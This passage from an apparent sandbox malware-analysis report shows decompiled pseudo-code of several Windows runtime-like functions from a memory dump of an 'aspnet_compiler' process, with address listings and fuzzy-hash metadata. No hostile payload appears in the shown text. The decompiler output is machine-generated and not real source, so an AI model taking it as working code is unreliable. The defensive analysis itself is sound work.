							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E018C9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									L0189EEF0(0x19779a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0189EB70(0, 0x19779a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1421d95
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E018BF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									L0189EEF0(0x19779a0);
									__eflags =  *0x1978210 - _t104; // 0x1421d88
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1978210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01904888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0189EB70(_t95, 0x19779a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E018C95D0();
											L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E018C95D0();
											L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0189EB70(_t93, 0x19779a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E018C95D0();
										L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E018C95D0();
										L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E018BF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                  0x018852a5
                                                  0x018852ad
                                                  0x018852b0
                                                  0x018852b3
                                                  0x018852b7
                                                  0x018852ba
                                                  0x018852bf
                                                  0x018852c4
                                                  0x018852cc
                                                  0x00000000
                                                  0x00000000
                                                  0x018852ce
                                                  0x018852d9
                                                  0x018852dd
                                                  0x018852e7
                                                  0x018852f7
                                                  0x018852f9
                                                  0x018852fd
                                                  0x018e0dcf
                                                  0x018e0dd5
                                                  0x018e0dd6
                                                  0x018e0dd7
                                                  0x018e0dd8
                                                  0x018e0dd9
                                                  0x018e0dde
                                                  0x018e0ddf
                                                  0x018e0de0
                                                  0x018e0de1
                                                  0x018e0de2
                                                  0x018e0de5
                                                  0x018e0dea
                                                  0x018e0dec
                                                  0x018e0f60
                                                  0x018e0f64
                                                  0x018e0f70
                                                  0x018e0f76
                                                  0x018e0f79
                                                  0x018e0f79
                                                  0x00000000
                                                  0x018e0f64
                                                  0x018e0df2
                                                  0x018e0df7
                                                  0x018e0e04
                                                  0x018e0e0d
                                                  0x018e0e0d
                                                  0x018e0e10
                                                  0x018e0e1a
                                                  0x018e0e1c
                                                  0x018e0e4c
                                                  0x018e0e52
                                                  0x018e0e61
                                                  0x018e0e67
                                                  0x018e0e6b
                                                  0x018e0e70
                                                  0x018e0e76
                                                  0x018e0ed7
                                                  0x018e0edc
                                                  0x018e0ee0
                                                  0x018e0ee6
                                                  0x018e0eea
                                                  0x018e0eed
                                                  0x018e0ef0
                                                  0x018e0ef3
                                                  0x018e0ef6
                                                  0x018e0ef9
                                                  0x018e0efe
                                                  0x018e0f01
                                                  0x018e0f01
                                                  0x018e0f0b
                                                  0x018e0f12
                                                  0x018e0f16
                                                  0x018e0f18
                                                  0x018e0f1b
                                                  0x018e0f2c
                                                  0x018e0f31
                                                  0x018e0f31
                                                  0x018e0f35
                                                  0x018e0f39
                                                  0x018e0f3a
                                                  0x018e0f3c
                                                  0x018e0f3f
                                                  0x018e0f50
                                                  0x018e0f55
                                                  0x018e0f55
                                                  0x018e0f59
                                                  0x018852eb
                                                  0x018852f1
                                                  0x018852f1
                                                  0x018e0e7d
                                                  0x018e0e84
                                                  0x018e0e88
                                                  0x018e0e8a
                                                  0x018e0e8d
                                                  0x018e0e9e
                                                  0x018e0ea3
                                                  0x018e0ea3
                                                  0x018e0ea7
                                                  0x018e0eaf
                                                  0x018e0eb3
                                                  0x018e0eb9
                                                  0x018e0eb9
                                                  0x018e0ebc
                                                  0x018e0ecd
                                                  0x018e0ecd
                                                  0x00000000
                                                  0x018e0eb3
                                                  0x018e0e21
                                                  0x018e0e2b
                                                  0x018e0e2f
                                                  0x018e0e30
                                                  0x018e0e3a
                                                  0x018e0e3f
                                                  0x018e0e41
                                                  0x00000000
                                                  0x00000000
                                                  0x018e0e47
                                                  0x00000000
                                                  0x018e0e47
                                                  0x018e0df9
                                                  0x018e0dfe
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018e0dfe
                                                  0x01885303
                                                  0x01885307
                                                  0x00000000
                                                  0x01885309
                                                  0x00000000
                                                  0x01885309
                                                  0x01885307
                                                  0x018852e9
                                                  0x018852e9
                                                  0x00000000
                                                  0x018852e9
                                                  0x0188530e
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9931d6b28eee6e822341ad60e6ee97cc9afa4c886c3529c4c7b3293e3e0cfb4e
                                                  • Instruction ID: 2ac647e597a907128bebf45d8425783959a2dda78eac3857f359c81c71aa572a
                                                  • Opcode Fuzzy Hash: 9931d6b28eee6e822341ad60e6ee97cc9afa4c886c3529c4c7b3293e3e0cfb4e
                                                  • Instruction Fuzzy Hash: B5519A71205742EBD721EF68C845B26BBE4FFA0714F14091EF499C7652EBB1EA00CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B2AE4 Relevance: .2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E018B2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1978204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1978208; // 0x1978207
				_t8 = _t57 + 0x1978208; // 0x1978207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1978450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x197821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1976d5c; // 0x7f940654
							_t72 =  *0x1976d5c; // 0x7f940654
							_t75 =  *0x1976d5c; // 0x7f940654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1976d5c; // 0x7f940654
							_t84 =  *0x1976d5c; // 0x7f940654
							_t87 =  *0x1976d5c; // 0x7f940654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E018CF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                  0x018b2ae4
                                                  0x018b2aec
                                                  0x018b2aef
                                                  0x018b2af4
                                                  0x018b2af7
                                                  0x018b2afd
                                                  0x018b2b92
                                                  0x018b2b92
                                                  0x018b2b97
                                                  0x018b2b9c
                                                  0x018b2b9c
                                                  0x018b2b03
                                                  0x018b2b06
                                                  0x018b2b09
                                                  0x018b2b09
                                                  0x018b2b0f
                                                  0x018b2b15
                                                  0x018b2b15
                                                  0x018b2b1b
                                                  0x018b2b1e
                                                  0x018b2b21
                                                  0x018b2b26
                                                  0x018b2b29
                                                  0x018b2b81
                                                  0x018b2b84
                                                  0x018b2c0e
                                                  0x018b2c15
                                                  0x018b2c24
                                                  0x018b2c24
                                                  0x018b2b8a
                                                  0x018b2b8a
                                                  0x018b2b8a
                                                  0x018b2b8a
                                                  0x018b2b90
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2b4a
                                                  0x018b2b4a
                                                  0x018b2b4d
                                                  0x018b2b53
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2b55
                                                  0x018b2b58
                                                  0x018b2bb7
                                                  0x018f5d1b
                                                  0x018f5d37
                                                  0x018f5d47
                                                  0x018f5d53
                                                  0x018b2bbd
                                                  0x018b2bbd
                                                  0x018b2bbd
                                                  0x018b2bb7
                                                  0x018b2b5d
                                                  0x018b2c2f
                                                  0x018f5d5b
                                                  0x018f5d77
                                                  0x018f5d87
                                                  0x018f5d93
                                                  0x018b2c35
                                                  0x018b2c35
                                                  0x018b2c35
                                                  0x018b2c2f
                                                  0x018b2b65
                                                  0x018b2b9f
                                                  0x018b2ba2
                                                  0x018b2b67
                                                  0x018b2b67
                                                  0x018b2b69
                                                  0x018b2b6b
                                                  0x018b2b6e
                                                  0x018b2bc9
                                                  0x018b2bcc
                                                  0x018b2bcf
                                                  0x018b2bd4
                                                  0x018b2bd6
                                                  0x018b2bd6
                                                  0x018b2bdb
                                                  0x018b2c02
                                                  0x018b2c05
                                                  0x018b2c07
                                                  0x00000000
                                                  0x018b2c07
                                                  0x018b2be0
                                                  0x018b2c00
                                                  0x018b2c3f
                                                  0x018b2c3f
                                                  0x00000000
                                                  0x018b2c00
                                                  0x018b2be5
                                                  0x018b2be7
                                                  0x018b2bec
                                                  0x018b2bf4
                                                  0x018b2bf6
                                                  0x00000000
                                                  0x018b2bf6
                                                  0x018b2b70
                                                  0x018b2b76
                                                  0x018b2b2b
                                                  0x018b2b2b
                                                  0x018b2b2d
                                                  0x018b2b2f
                                                  0x018b2b32
                                                  0x018b2b35
                                                  0x018b2b3a
                                                  0x00000000
                                                  0x018b2b40
                                                  0x018b2b43
                                                  0x018b2b45
                                                  0x018b2b47
                                                  0x018b2b4a
                                                  0x018b2b4d
                                                  0x018b2b53
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2b53
                                                  0x018b2b78
                                                  0x018b2b78
                                                  0x018b2b7b
                                                  0x018b2b7e
                                                  0x00000000
                                                  0x018b2b7e
                                                  0x018b2b76
                                                  0x018b2ba5
                                                  0x018b2ba5
                                                  0x018b2ba8
                                                  0x018b2bad
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2baf
                                                  0x018b2baf
                                                  0x018b2bc2
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ecfdadc0e35e8171fe12ebdd123785654f08cb05bc01e76937c5a0f3f6faa5f
                                                  • Instruction ID: b049eaf8f5be5c73a8743f81cd9efe27861cd0f1275e6c141e9889a5bb9cd398
                                                  • Opcode Fuzzy Hash: 2ecfdadc0e35e8171fe12ebdd123785654f08cb05bc01e76937c5a0f3f6faa5f
                                                  • Instruction Fuzzy Hash: E0519E76A00129CB8B18CF1CC8909FDB7B2FF88700715855AE846DB365DB34BA51DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018ADBE9 Relevance: .1, Instructions: 149COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E018ADBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						L0188CC50(E01884510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(L018A7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = L01958ED6(_t102, _t98);
						}
						_t76 = _v44;
						E018A2280(_t58, _v44);
						E018ADD82(_v44, _t102, _t98);
						E018AB944(_t102, _v5);
						return L0189FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1978628; // 0x0
							_v28 = _t67;
							_t68 =  *0x197862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1978628; // 0x0
						_t105 = _v28;
						_t80 =  *0x197862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x194fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                  0x018adbe9
                                                  0x018adbf2
                                                  0x018adbf7
                                                  0x018adbf9
                                                  0x018adbfc
                                                  0x018adc00
                                                  0x018adc03
                                                  0x018adc14
                                                  0x018add54
                                                  0x018add54
                                                  0x018add54
                                                  0x018adc18
                                                  0x018adc1d
                                                  0x018adc1d
                                                  0x018adc32
                                                  0x018adc3b
                                                  0x018adc3e
                                                  0x018adc46
                                                  0x018add5b
                                                  0x018add62
                                                  0x018add64
                                                  0x018add67
                                                  0x018add69
                                                  0x018add6b
                                                  0x018add6e
                                                  0x018add70
                                                  0x018add73
                                                  0x018add73
                                                  0x00000000
                                                  0x018adc4c
                                                  0x018adc4e
                                                  0x018f3ae3
                                                  0x018f3ae8
                                                  0x018f3aea
                                                  0x018adce7
                                                  0x018adce9
                                                  0x018adcec
                                                  0x018adcee
                                                  0x018adcf0
                                                  0x018adcf3
                                                  0x018adcf5
                                                  0x018f3af2
                                                  0x018f3af5
                                                  0x018f3af5
                                                  0x018add06
                                                  0x018add08
                                                  0x018add0b
                                                  0x018add12
                                                  0x018f3b08
                                                  0x018add18
                                                  0x018add18
                                                  0x018add18
                                                  0x018add20
                                                  0x018add23
                                                  0x018f3b16
                                                  0x018f3b16
                                                  0x018add29
                                                  0x018add2d
                                                  0x018add36
                                                  0x018add40
                                                  0x018add51
                                                  0x018add51
                                                  0x018adc54
                                                  0x018adc59
                                                  0x018adc59
                                                  0x018adc5e
                                                  0x018adc5e
                                                  0x018adc63
                                                  0x018adc66
                                                  0x018adc6b
                                                  0x018adc78
                                                  0x018adc7b
                                                  0x018adc81
                                                  0x018adc81
                                                  0x018adc83
                                                  0x018adc89
                                                  0x00000000
                                                  0x00000000
                                                  0x018add7b
                                                  0x018add7b
                                                  0x018adc8f
                                                  0x018adc8f
                                                  0x018adc92
                                                  0x018adc99
                                                  0x018adc9f
                                                  0x018adca5
                                                  0x018adcaa
                                                  0x018adcaa
                                                  0x018adcb3
                                                  0x018adcb8
                                                  0x018adcbb
                                                  0x018adcc1
                                                  0x018adccf
                                                  0x018adcd2
                                                  0x018adcd5
                                                  0x018adcd7
                                                  0x018adcda
                                                  0x018adcdc
                                                  0x018adcdc
                                                  0x018adce2
                                                  0x018adce4
                                                  0x00000000
                                                  0x018adce4

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d4355ed26485c2b407be7c7394670076261a45ac32c68b53dbcc0856a38dacc6
                                                  • Instruction ID: 33fbf706fdee9338ab2ac3e084dac57fabc4fd19339a630eae7986b907304eb5
                                                  • Opcode Fuzzy Hash: d4355ed26485c2b407be7c7394670076261a45ac32c68b53dbcc0856a38dacc6
                                                  • Instruction Fuzzy Hash: 4851BE71A0160ADFDB14CFACC480AAEFBF1BF58310F64825ADA55E7744DB34AA44CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B2990 Relevance: .1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E018B2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				intOrPtr* _t69;
				intOrPtr _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t82;
				intOrPtr* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				intOrPtr _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x195ff00);
				E018DD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1861664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E018CE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1861668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E019051BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x186166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E018B2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = L01896600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = L018B2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								L0189EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E018B2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = L018B2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E018B2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E018DD0D1(_t62);
				goto L28;
			}





















                                                  0x018b2990
                                                  0x018b2992
                                                  0x018b2997
                                                  0x018b29a3
                                                  0x018b29a6
                                                  0x018b29ab
                                                  0x018b29ad
                                                  0x018b29b2
                                                  0x018f5c80
